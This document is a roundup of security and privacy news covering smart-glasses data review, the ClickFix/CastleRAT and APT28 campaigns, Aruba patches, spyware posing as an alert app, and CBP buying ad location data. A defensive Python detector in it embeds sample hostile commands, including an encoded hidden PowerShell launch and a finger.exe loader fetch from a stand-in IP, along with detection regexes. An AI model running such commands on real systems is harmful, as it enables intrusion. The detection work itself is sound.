
Meta’s Smart Glasses Face Privacy Backlash as Experts Flag Legal and Ethical Risks

Concerns around Meta’s AI-enabled smart glasses are intensifying after reports suggested that human reviewers may have accessed sensitive user recordings, raising broader questions about privacy, consent, and data protection.

Online discussions have surged, with users expressing alarm over how much data may be visible to the company. Some individuals on forums have claimed that recorded footage could be manually reviewed to train artificial intelligence systems, while others raised concerns about the use of such devices in sensitive environments like healthcare settings, where patient information could be unintentionally exposed.


What triggered the controversy?

The debate gained momentum following an investigation by Swedish media outlets, which reported that contractors working at external facilities were tasked with reviewing video recordings captured through Ray-Ban Meta Smart Glasses. According to these findings, some of the reviewed material included highly sensitive content.

The issue has since drawn regulatory attention in multiple regions. Authorities in the United Kingdom, including the Information Commissioner's Office, have sought clarification on how such user data is processed. In the United States, the controversy has also led to legal action against Meta Platforms, with allegations that consumers were not adequately informed about the device’s privacy safeguards.

The timing matters, as smart glasses are rapidly gaining popularity. Legal filings suggest that more than seven million units were sold in 2025 alone. Unlike smartphones, these glasses resemble regular eyewear but can discreetly capture images, audio, and video from the wearer’s perspective, often without others being aware.


Why are experts concerned?

Legal analysts highlight that such practices could conflict with India’s Digital Personal Data Protection Act, 2023, if data involving Indian individuals is collected.

According to legal experts, consent remains a foundational requirement. Any access to recordings involving identifiable individuals must be based on informed approval. If footage is reviewed without the knowledge or permission of those captured, it could constitute a violation of Indian data protection law.

Beyond legality, specialists argue that wearable AI devices introduce a deeper structural issue. Unlike traditional data collection methods, these tools continuously capture real-world environments, making it difficult to define clear boundaries for data usage.

Experts also point out that although Meta includes visible indicators such as LED lights to signal recording, these measures do not fully address how the data of bystanders is processed. There are concerns about the absence of strict limitations on why such data is collected or how much of it is retained.

Additionally, outsourcing the review of user-generated content introduces further complications. Apart from the risk of misuse or unauthorized sharing, there are also ethical concerns regarding the working conditions and psychological impact on individuals tasked with reviewing potentially distressing material.


Cross-border and systemic risks

Another key concern is international data handling. If recordings involving Indian users are accessed by contractors located overseas, companies are still expected to maintain the same standards of security and confidentiality required under Indian regulations.

Experts emphasize that these devices are part of a much larger artificial intelligence ecosystem. Data captured through smart glasses is not simply stored. It may be uploaded to cloud servers, processed by machine learning systems, and in some cases, reviewed by humans to improve system performance. This creates a chain of data handling where highly personal information, including facial features, voices, surroundings, and behavioral patterns, may circulate beyond the user’s direct control.


What is Meta’s response?

Meta has stated that protecting user data remains a priority and that it continues to refine its systems to improve privacy protections. The company has explained that its smart glasses are designed to provide hands-free AI assistance, allowing users to interact with their surroundings more efficiently.

It also acknowledged that, in certain cases, human reviewers may be involved in evaluating shared content to enhance system performance. According to the company, such processes are governed by its privacy policies and include steps intended to safeguard user identity, such as automated filtering techniques like face blurring.

However, reports citing Swedish publications suggest that these safeguards may not always function consistently, with some instances where identifiable details remain visible.

While recording must be actively initiated by the user, either manually or through voice commands, experts note that many users may not fully understand that their captured content could be subject to human review.


The Ripple Effect

This controversy reflects a wider shift in how personal data is generated and processed in the age of AI-driven wearables. Unlike earlier technologies, smart glasses operate in real time and in shared environments, raising complex questions about consent not just for users, but for everyone around them.

As adoption accelerates, regulators worldwide are likely to tighten scrutiny of such devices. The challenge for companies will be to balance innovation with transparent data practices, especially as public awareness of digital privacy continues to rise.

For users, this is a wake-up call not to rely blindly on new technology and to take into account that convenience-driven products often come with hidden trade-offs, particularly when it comes to control over personal data.

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks


Cyber threat actors known as Velvet Tempest have been observed deploying sophisticated attacks involving Termite ransomware, utilizing the ClickFix social engineering technique and the CastleRAT backdoor. These intrusions, tracked by MalBeacon researchers, unfolded over 12 days in a simulated U.S. non-profit environment with over 3,000 endpoints. Velvet Tempest, active for at least five years, has affiliations with major ransomware strains like Ryuk, REvil, Conti, BlackCat, LockBit, and RansomHub.

The attacks begin with malvertising campaigns directing victims to fake CAPTCHA pages that trick users into pasting obfuscated PowerShell commands into the Windows Run dialog. This ClickFix method bypasses browser security features, chaining cmd.exe processes and using legitimate tools like finger.exe to fetch malware loaders, often disguised as PDF archives. Subsequent stages involve PowerShell downloads, .NET compilation via csc.exe, and Python-based persistence in ProgramData directories.

Once inside, attackers conduct Active Directory reconnaissance, host discovery, and credential harvesting from Chrome browsers using hosted PowerShell scripts linked to Termite staging servers. They deploy DonutLoader to retrieve CastleRAT, a remote access trojan that steals credentials, logs keystrokes, captures screens, and employs UAC bypass via trusted binaries like ComputerDefaults.exe. CastleRAT hides its command-and-control servers using Steam Community profiles as dead-drop resolvers, blending traffic with legitimate web activity. 

Although ransomware deployment was not observed in this intrusion, Termite, a Babuk-based variant that emerged in late 2024, employs double extortion by exfiltrating data before encrypting files. It deletes shadow copies with vssadmin.exe, empties the Recycle Bin, and has targeted high-profile victims like SaaS provider Blue Yonder and Australian IVF firm Genea. The group gains initial access by exploiting vulnerabilities, such as those in Cleo's file transfer software, or via phishing and compromised sites.

Organizations should prioritize defenses against ClickFix by training users on suspicious prompts, monitoring PowerShell abuse, and blocking anomalous tool executions like finger.exe or csc.exe. Implementing deception environments, as used by MalBeacon, aids early detection of such hands-on-keyboard activities. With Velvet Tempest's history of devastating breaches, vigilance against evolving ransomware tactics remains critical in 2026.
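As an added example (not MalBeacon's tooling or any vendor's published rule), the checks below run over constructed Sysmon-style process-creation events and flag the stages of the chain described above: a shell launched from the Run dialog with encoded or hidden-window flags, finger.exe spawned from a shell, csc.exe under PowerShell, and a Python interpreter living under ProgramData. The JSON field names, sample events and severity labels are all assumptions made for the example.

```python
"""Flag ClickFix-style process chains in constructed Sysmon-like process
creation events.  Added example, not MalBeacon's or Microsoft's tooling;
the JSON field names mirror Sysmon Event ID 1 exports and the events
are constructed, not captured from a real intrusion."""
import json
import ntpath
import re
from typing import Dict, List, Tuple

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Encoded / hidden-window PowerShell flags typical of pasted ClickFix commands.
OBFUSCATION = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|\biex\b|"
    r"invoke-expression|frombase64string)")

# Constructed sample telemetry: events 1-4 mirror the chain in the article
# (Run dialog -> cmd/PowerShell -> finger.exe fetch -> csc.exe compile ->
# Python under ProgramData); event 5 is benign noise.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c powershell -w hidden -enc SQBFAFgAIAAo"},
    {"id": 2, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": r"finger.exe update@203.0.113.10 > %TEMP%\report.pdf"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /noconfig /fullpaths @C:\Users\u\AppData\Local\Temp\x.cmdline"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\ProgramData\py\python.exe",
     "CommandLine": r"C:\ProgramData\py\python.exe C:\ProgramData\py\svc.py"},
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
])


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def classify(event: Dict) -> List[Tuple[str, str]]:
    """Return (rule, severity) hits for one process-creation event."""
    parent, image = _base(event["ParentImage"]), _base(event["Image"])
    cmd = event["CommandLine"]
    hits = []
    # Win+R launches are children of explorer.exe; a shell spawned there with
    # encoded or hidden-window flags matches the paste-and-run lure.
    if parent == "explorer.exe" and image in SHELLS and OBFUSCATION.search(cmd):
        hits.append(("run_dialog_obfuscated_shell", "high"))
    # finger.exe is effectively unused in modern estates, so any execution is
    # worth a look; spawned from a shell it is the loader-fetch step.
    if image == "finger.exe":
        hits.append(("finger_exe_execution", "high" if parent in SHELLS else "medium"))
    # csc.exe under a shell means runtime .NET compilation. Add-Type does this
    # legitimately, so keep it medium and let the analyst correlate.
    if image == "csc.exe" and parent in SHELLS:
        hits.append(("runtime_dotnet_compilation", "medium"))
    # An interpreter living under ProgramData is the persistence artefact.
    if image.startswith("python") and "\\programdata\\" in event["Image"].lower():
        hits.append(("python_from_programdata", "high"))
    return hits


def scan(jsonl: str) -> List[Tuple[int, str, str]]:
    """Run classify() over JSON-lines telemetry; returns (event id, rule, severity)."""
    findings = []
    for line in jsonl.splitlines():
        if line.strip():
            ev = json.loads(line)
            findings.extend((ev["id"], rule, sev) for rule, sev in classify(ev))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Each rule fires on its own event so a single hit is a lead, not a verdict; two or more from the same host in a short window is the pattern worth escalating.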

APT28 Deploys Enhanced Version of Covenant in Ongoing Threat Activity


In recent months, the contours of cyber warfare have once again become clearer as APT28, an arm of Russian intelligence that has operated against Ukraine for a number of years, displays renewed precision and technological sophistication in its operations against Ukrainian defense networks. 

The group, also known as Fancy Bear, has been referred to by multiple aliases throughout the cybersecurity community, including Sednit, Forest Blizzard, Unit 26165, and TA422, and is known for adapting its operations to geopolitical objectives. In its latest campaign, APT28 has implemented a dual-pronged malware strategy that combines innovation and intent. 

The group has deployed an undocumented backdoor, BEARDSHELL, alongside a heavily customized implementation of the open-source post-exploitation framework COVENANT. 

The development indicates a calculated effort to refine persistence, evade detection, and gain deeper operational footholds in sensitive military environments. 

Designed specifically for stealth and long-term access, BEARDSHELL works in conjunction with the modified COVENANT toolkit, which has been adapted to the group's command-and-control requirements and operational procedures. Combined, these tools represent a growing trend toward modular and adaptable malware ecosystems that can be tailored to specific target and mission requirements. 

It is becoming increasingly apparent that as the conflict in Ukraine continues to escalate into the digital realm, state-backed actors are utilizing cyber capabilities in a variety of ways, often invisible but profoundly consequential, to gather intelligence and shape the strategic landscape. 

The campaign illustrates a tightly coordinated intrusion chain designed to penetrate Ukrainian military and government networks with minimal friction and maximum persistence based on this operational shift. 

Based on the investigations conducted, it has been determined that the activities attributed to APT28 are mainly directed towards central executive bodies, where access to strategic communications and operational data provides a valuable source of information. 

The initial compromise relies on spear-phishing lures that masquerade as routine administrative or defense correspondence, distributed via email as well as encrypted messaging channels such as Signal. Once the weaponized Office documents are opened, they initiate a fileless infection sequence designed to evade conventional endpoint defenses. 

The chain consists of a memory-resident backdoor derived from a substantially altered variant of the Covenant framework, repurposed to serve as a discreet loader for further payloads. During this stage, bespoke implants such as BeardShell and SlimAgent are deployed.

The latter bears architectural resemblance to the earlier XAgent toolkit developed by the group in the past. The combination of these components creates a robust surveillance environment within compromised systems, facilitating continuous data collection of keystrokes, screen captures, and clipboards. 

Exfiltrated intelligence is organized into HTML-based logs that include color-coded segmentation for rapid parsing and prioritization by operators. It is noteworthy that the group has built a command-and-control infrastructure tailored to its requirements. Rather than using servers that are easily identifiable, the attackers relay instructions and store stolen data through a number of cloud storage platforms, including pCloud, Koofr, Filen, and Icedrive. 

As a result, malicious activity blends with routine user activity, significantly hampering detection efforts. Based on the forensic analysis of these cloud-linked accounts, it has been determined that certain Ukrainian systems have been continuously monitored for extensive periods of time, demonstrating APT28's ability to collect intelligence in high-value environments in a low-visibility manner. 

Moreover, the researchers at ESET have provided additional technical insight into the operation, tracing its deployment to at least April 2024, when a structured, sustained intrusion effort began. According to their findings, the coordinated use of BeardShell and Covenant was not an accident, but intentionally designed to provide prolonged, low-noise surveillance of Ukrainian military personnel and government organizations. 

Recent incidents indicate that the infection chain exploits a vulnerability tracked as CVE-2026-21509, triggered by malicious DOC files designed to execute code upon opening. SlimAgent, a surveillance-focused implant, was identified within a compromised Ukrainian government system, where it systematically collected keystrokes, clipboard contents, and screen captures without causing immediate suspicion. 

According to the subsequent analysis, BeardShell is a modern, modular backdoor that emphasizes stealth and flexibility. It uses Icedrive's infrastructure for command-and-control communication and executes remote PowerShell commands within a managed .NET runtime environment. 

Its internal design includes an obfuscation method previously associated with Xtunnel, a network pivot utility historically connected to APT28's earlier campaigns, demonstrating a deliberate reuse of proven techniques. Meanwhile, the Covenant framework, reworked from its original open-source version, is used as the primary operational implant. 

Changes have also been observed in the generation of deterministic identifiers linked to host-specific attributes, in execution logic intended to bypass behavioral detection engines, and in the integration of cloud-based communication channels. As part of the group's infrastructure strategy, Koofr and pCloud have gradually been replaced by newer platforms such as Filen since mid-2025. 

In this architecture, Covenant serves as the primary access mechanism, while BeardShell serves as a contingency tool to ensure operations continue even in cases of partial detection or remediation. Extending the scope of the analysis, researchers have also highlighted that the threat actor's toolkit reflects a deliberate blend of legacy codebases and newly developed capabilities. 

SLIMAGENT is an implant that was formally disclosed by CERT-UA in mid-2025 and examined in greater detail by ESET the following year. It is designed for continuous, granular data collection through keystroke logging, screenshot capture, and clipboard harvesting, effectively turning compromised systems into persistent intelligence-gathering nodes. 

SLIMAGENT is distinguished by more than its functionality; it is also distinguished by its lineage. Based on technical comparisons, SLIMAGENT does not appear to be a completely new development, but rather is an evolution of APT28's earlier XAgent toolset, which was widely deployed by the group during the 2010s. 

In support of this assessment, code-level similarities have been identified across multiple samples, including artifacts recovered from early-2018 intrusion campaigns targeting European governmental entities. Moreover, the correlation between the keylogging routines and an XAgent variant observed in late 2014 suggests continuity of development rather than a one-time invention. The structured formatting of exfiltrated data remains one of the most distinctive features across these generations. 

The SLIMAGENT surveillance software, like its predecessor, compiles its output into HTML-formatted logs, utilizing a consistent color code scheme to distinguish between application identification numbers, captured keystrokes, and active window titles. As a result of this seemingly inconsequential design choice, operators now benefit from a streamlined interface to speed up the data triage process, thereby reinforcing the campaign's operational efficiency.

Additionally, BEARDSHELL functions as an execution layer within the compromised environment, facilitating remote command delivery via PowerShell within a controlled .NET environment, complementing SLIMAGENT's data collection capabilities. 

By relying on Icedrive for command-and-control, the group maintains covert access while minimizing detection risk, continuing its emphasis on blending malicious activity with legitimate network traffic. All of these findings reinforce that organizations operating in high-risk geopolitical environments, particularly those within the government and defense sectors, need to recalibrate their defensive posture.

There is a need for security teams to adopt behavior-driven monitoring as an alternative to traditional signature-based detection models to identify anomalous processes, in-memory payload delivery, and misuse of legitimate cloud services. 

In addition to stricter controls on macro execution and file provenance, it is essential to scrutinize document-based attack vectors, particularly those exploiting known vulnerabilities like CVE-2026-21509. 

Meanwhile, the increasing use of trusted cloud platforms for command-and-control activities underscores the significance of maintaining visibility into outbound network traffic and implementing zero-trust principles to restrict lateral movement.

A coordinated threat hunt in conjunction with timely intelligence sharing among national and international cybersecurity bodies will be essential in combating such campaigns. With adversaries continuing to combine legacy techniques with modern infrastructure to refine their toolchains, resilience will depend on defenders' abilities to anticipate and adapt to an environment that is becoming increasingly covert and persistent.

HPE Patches Critical Aruba AOS-CX Vulnerabilities Including Authentication Bypass Flaw


Hewlett Packard Enterprise (HPE) has released security updates to address multiple vulnerabilities in its Aruba AOS-CX network operating system, including a critical flaw that could allow attackers to bypass authentication and gain administrative control. 

AOS-CX is the network operating system of Aruba Networks, a part of HPE, built specifically for cloud-based networking needs. It runs on CX-series switches found in large enterprise campuses and data centers. Because so many organizations rely on them, any flaws present serious concerns when discovered. 

What stands out is CVE-2026-23813, a severe flaw tied to how AOS-CX switches handle login security via their web portal. HPE confirms that attackers could abuse this weakness remotely, needing no prior access or advanced skills. Control over compromised devices might follow, including forced changes to admin credentials. Though simple to trigger, the outcome carries heavy risk: the exposure arises solely through network interaction, and little effort may yield full system override. 

Security hinges on timely updates, yet patch details remain sparse. Once such an entry point opens, remote manipulation becomes feasible and unintended access escalates quickly until corrective measures are applied. In the advisory, HPE stated it had seen no signs of real-world attacks nor any public tools built to exploit these flaws. Still, given how serious the weakness is, rolling out fixes quickly becomes a top priority for most teams. 

When updates cannot happen right away, HPE suggests ways to lower exposure. One path involves isolating management ports inside private network zones. Access rules should be tightly defined, minimizing who can connect. Unneeded web-based entry points over HTTP or HTTPS ought to be turned off completely. Trust boundaries may also tighten by using ACLs that allow only known devices to interact. 

Watching system logs closely adds another layer - unexpected login attempts often show up there first. These weaknesses fit into a wider trend of issues HPE has tackled lately. Back in July 2025, hidden login credentials emerged in Aruba Instant On wireless units, opening doors for unauthorized access. Before that, fixes rolled out for several problems in the StoreOnce data protection system, some of which let intruders skip verification steps entirely. Remotely exploitable flaws also surfaced, giving attackers potential command over affected machines. 

More recently, the Cybersecurity and Infrastructure Security Agency (CISA) flagged a high-severity vulnerability in HPE OneView as actively exploited in the wild, underscoring the growing focus of threat actors on enterprise infrastructure tools. With more than 55,000 enterprise clients worldwide, HPE points out that timely updates and stronger network defenses help reduce risks. Many of these clients appear on the Fortune 500 list, highlighting the scale of exposure when security lapses occur. Because threats evolve quickly, waiting is rarely an option. 

Instead, consistent maintenance becomes a quiet but steady shield. Even small delays can widen vulnerabilities across complex systems. When flaws appear in network management tools, specialists warn these often pose high risk - attackers might gain extensive access across company systems. Without immediate fixes, even unused weaknesses invite trouble down the line. 

Updates applied quickly, combined with multiple protective layers, help reduce potential harm before incidents occur. When companies depend heavily on unified network systems, events such as these reveal how crucial it is to maintain constant oversight while reacting quickly when new risks appear.

Spyware Disguised as Safety App Targets Israelis Amid Rising Cyber Espionage Activity


A fresh wave of digital spying has emerged, aiming at people within Israel through fake apps made to look like official warning tools. Instead of relying on obvious tricks, it uses the credibility of public alerts to encourage downloads of harmful programs. 

Cyber experts highlight how these disguised threats pretend to offer protection while actually stealing information. Trust in urgent notifications becomes the weak spot exploited here. What seems helpful might carry hidden risks beneath its surface. Noticed first by experts at Acronis, the operation involves fake texts mimicking alerts from Israel’s Home Front Command - an IDF division. 

Instead of genuine warnings, these messages push a counterfeit app update for civilian missile notifications. While seeming official, the link leads to malicious software disguised as a protection tool. Following the instructions, people install spyware rather than a genuine program. Experts say the harmful software can harvest precise location, text messages, stored credentials, contact lists, and private files kept on the device. The group behind it has been active for years within cyber intelligence circles. 

Thought to be connected with Arid Viper, the operation fits patterns seen before. Targets often include Israeli military figures, alongside people in areas like Egypt and Palestine. Instead of complex tools, they lean on social engineering to spread malicious software. Their methods persist over time, adapting without drawing attention. What stands out is the level of preparation seen in the attackers, according to Acronis. Their operations show a clear aim, targeting systems people rely on when tensions rise between nations. 

Instead of random strikes, these actions follow a pattern meant to blend in. Official-looking messages appear during crises, shaped like real alerts. Because they resemble legitimate warnings, users are more likely to respond without suspicion. Infrastructure once seen as safe now becomes a vector - simply because it's trusted at critical moments. 

A fresh report from Check Point Software Technologies reveals cyberattacks targeting surveillance cameras in Israel and neighboring areas of the Middle East. These intrusions point toward coordinated moves to collect data while possibly preparing to interfere with essential infrastructure. Cyber operations have emerged alongside rising friction after documented strikes by U.S. and Israeli forces on locations inside Iran. 

In response, several groups aligned with Tehran have stated they carried out digital intrusions aimed at both official Israeli bodies and corporate networks. Even so, specialists observe that such assaults still lack major influence on the overall struggle. Yet, as nations lean more heavily on hacking methods, it becomes clear - cyber tactics now weave tightly into global power contests. When links arrive unexpectedly, skipping the download is wise - trust matters less than origin. 

Official storefronts serve as safer gateways compared to random web prompts. Messages mimicking familiar brands often hide traps beneath clean designs. Jumping straight to installation bypasses crucial checks best left intact. Verified platforms filter out many hostile imitations by design. Risk shrinks when access follows established paths instead of sudden urges. 

When emergencies strike, cyber threats tend to rise - manipulating panic instead of logic. Pressure clouds judgment, creating openings for widespread breaches. Urgency becomes a tool, not a shield, in these moments. Digital attacks grow sharper when emotions run high. Crises rarely pause harm; they invite it.

CBP Admits Buying Ad Data to Secretly Track Phone Locations


U.S. Customs and Border Protection (CBP) has admitted to buying phone location data from the online advertising world, making it the first government agency to confirm such practices. The disclosure appears in a Privacy Threshold Analysis document covering 2019 to 2021, which 404 Media obtained via a Freedom of Information Act request and which describes a proof-of-concept trial. The data, embedded in the real-time bidding (RTB) mechanisms of apps, can be used to track people’s movements with great precision, unbeknownst to them. 

Real-time bidding is what drives the ads that users see in mobile apps: advertisers bid in real time to display targeted content. In these auctions, little-known advertising tech companies collect device identifiers, app usage, and geolocation data from tens of thousands of apps, including popular games like Candy Crush and fitness apps like MyFitnessPal. That information is packaged and resold, and tracking it creates a “gold mine” of surveillance because it exposes daily routines, home addresses, and places of work. 

CBP’s use of such data is troubling from a privacy standpoint, as it circumvents traditional warrants and draws on an ecosystem that most users never knowingly agreed to. The agency evaluated the technology to track activity close to borders but would not say, when asked, whether it still uses the method. Related agencies, such as Immigration and Customs Enforcement, have sought to procure similar tools, like Webloc, which allows users to track phones at neighborhood scale. 

This incident highlights broader government reliance on commercial data brokers for surveillance, echoing past revelations about low-cost ad-based location spying. Apps from dating services to social networks unwittingly feed this pipeline, often without developers' awareness. Critics argue it erodes Fourth Amendment protections, enabling mass tracking under the guise of national security. 

As digital ad ecosystems expand, regulators face pressure to curb these hidden data flows before they normalize warrantless monitoring. Users can mitigate risks by limiting app permissions, using VPNs, and supporting privacy laws like those targeting data brokers. Policymakers must now scrutinize how border security intersects with everyday app usage to safeguard civil liberties in an ad-driven world.
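To make the data flow described above concrete, here is an added example (not from 404 Media, CBP or any ad-tech vendor) that lists the identifier and location fields a bidder receives in a constructed OpenRTB-style bid request, then applies a minimisation pass that strips the advertising ID and publisher user id, truncates the IP to a /24 and snaps GPS coordinates to a roughly 1 km grid. The request body, identifiers and grid size are assumptions; the field names follow OpenRTB 2.x object naming.

```python
"""Which fields of an OpenRTB-style bid request let a bidder track a device,
and a data-minimisation pass an app SDK or exchange could apply before the
request is broadcast.  Added example; the request is constructed using
OpenRTB 2.x object names (app.bundle, device.ifa, device.geo, user.id),
not captured auction traffic."""
import copy
import ipaddress
import math
from typing import Any, Dict

# Constructed sample bid request: identifiers and coordinates are made up.
BID_REQUEST: Dict[str, Any] = {
    "id": "req-0001",
    "app": {"bundle": "com.example.fitness", "name": "Example Fitness"},
    "device": {
        "ifa": "3b0d8f2a-0000-4000-8000-000000000001",  # advertising ID
        "ip": "203.0.113.45",
        "ua": "Mozilla/5.0 (Linux; Android 13)",
        "geo": {"lat": 38.89767, "lon": -77.03650, "type": 1, "accuracy": 8},
    },
    "user": {"id": "u-7781"},
}

# Dotted paths a data buyer would join on to build a movement profile.
TRACKING_FIELDS = ("device.ifa", "device.ip", "device.geo.lat",
                   "device.geo.lon", "user.id", "app.bundle")


def _lookup(obj: Any, path: str) -> Any:
    for key in path.split("."):
        if not isinstance(obj, dict) or key not in obj:
            return None
        obj = obj[key]
    return obj


def tracking_exposure(req: Dict[str, Any]) -> Dict[str, Any]:
    """Return the identifier and location fields present in a bid request."""
    return {p: v for p in TRACKING_FIELDS if (v := _lookup(req, p)) is not None}


def minimise(req: Dict[str, Any], grid_km: float = 1.0) -> Dict[str, Any]:
    """Drop stable identifiers and snap GPS coordinates to a grid_km grid."""
    out = copy.deepcopy(req)
    dev = out.setdefault("device", {})
    dev.pop("ifa", None)          # no cross-app join key
    out.pop("user", None)         # no publisher user id
    if "ip" in dev:               # keep only the /24 for coarse geo-targeting
        net = ipaddress.ip_network(f"{dev['ip']}/24", strict=False)
        dev["ip"] = str(net.network_address)
    geo = dev.get("geo")
    if geo and "lat" in geo and "lon" in geo:
        # ~111 km per degree of latitude; a degree of longitude shrinks with
        # cos(lat).  Flooring onto the grid means repeated requests from the
        # same home or office all land on the same cell, not the same address.
        step_lat = grid_km / 111.0
        step_lon = grid_km / (111.0 * max(math.cos(math.radians(geo["lat"])), 1e-6))
        geo["lat"] = round(math.floor(geo["lat"] / step_lat) * step_lat, 4)
        geo["lon"] = round(math.floor(geo["lon"] / step_lon) * step_lon, 4)
        geo.pop("accuracy", None)
        geo["type"] = 2           # OpenRTB location type 2: IP-derived / coarse
    return out


if __name__ == "__main__":
    print("exposed to bidders:", tracking_exposure(BID_REQUEST))
    print("after minimisation:", tracking_exposure(minimise(BID_REQUEST)))
```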
